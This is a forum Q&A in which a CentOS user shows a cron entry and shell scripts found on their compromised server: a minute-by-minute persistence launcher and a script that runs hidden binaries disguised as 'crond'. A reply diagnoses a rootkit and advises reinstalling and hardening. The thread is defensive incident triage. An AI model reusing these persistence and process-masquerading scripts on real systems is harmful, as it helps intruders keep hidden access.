# centos: root user's crontab gets deleted and replaced - malicious code?

Tags: cron, centos, centos6

**I am trying to figure out if my /var/spool/crontab/root is getting overwritten by a virus or malicious code:**

I woke up this morning and my /var/spool/crontab/root file was empty, except for this line, which was not written by me:

```
* * * * * /usr/home/.bash_history/update > /dev/null 2>&1
```

I looked for this **update** file that is set to run, and this is what it contains:

```
#!/bin/sh
if test -r /usr/home/.bash_history/pid; then
Pid=$(cat /usr/home/.bash_history/pid)
if $(kill -CHLD $Pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /usr/home/.bash_history
./run &>/dev/null
```

That update file calls a file named **run**, which contains:

```
#!/bin/bash

ARCH=`uname -m`
HIDE="crond"

if [ "$ARCH" == "i686" ];       then
        ./h32 -s $HIDE ./run32
elif [ "$ARCH" == "x86_64" ];   then
        ./h64 -s $HIDE ./run64
fi
```

**Here are the full contents of that /usr/home directory, which I do not recognize:**
[image]
I am running centos6.8

Answer (score 0, accepted):

I think you've been hacked, possibly by someone using a downloadable rootkit. They're available to any moron with a modem, many of whom won't even know what to do with the system once they've successfully hacked in.

The safest thing you can do is re-install the OS from scratch, and this time employ **much** stronger passwords. (Sorry, "pa$$w0rd" don't cut it.) You might try just changing passwords and scouring the system for anything suspicious, but there's a good chance something was changed that you'll never recognize.

I had a system hacked once where they replaced the "ls", "ps", and who knows what other commands with substitutes that skipped over their meddling, making it much more difficult to be 100% certain we'd found and fixed all their changes.

After your re-install, look up how to convert the shadow hashing to use SHA512. The default hashing algorithm is stored in /etc/login.defs, and is probably MD5, not nearly strong enough these days. But even with a stronger hash, many weak passwords fall quickly to a brute force attack.

While you're at it, you might as well get CentOS 6.9 which will include more security patches.